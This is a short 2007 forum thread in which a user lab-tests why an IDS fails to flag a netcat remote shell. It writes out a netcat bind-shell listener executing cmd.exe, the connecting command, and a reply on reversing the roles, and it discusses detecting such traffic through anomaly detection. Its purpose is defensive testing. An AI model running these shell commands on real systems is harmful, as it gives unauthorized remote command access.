IPS will not detect a successful netcat attack

jopontes · ‎09-13-2007

I am doing the following lab testing:

nc ?v ?l ?e cmd.exe ?p 565

Attacker:

nc ?v .x.x.x.x 565

I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?

Any help is highly appreciated.

jopontes · ‎09-13-2007

***

nc -v -l -e cmd.exe -p 565

Attacker:

nc -v .x.x.x.x 565

mhellman · ‎09-14-2007

You are using netcat to setup a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client, it redirects STDIN and STDOUT to the client.

To trigger your signature, setup the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.

jopontes · ‎09-14-2007

Got it! But, as a matter of fact my doubt was:

Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?

mhellman · ‎09-14-2007

Not reliably AFAIK. It's not like telnet or ftp that tend to use specific ports or have application RFC's. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.

jopontes · ‎09-14-2007

Thanks Matt! I'll try to update the sensor and play with that then.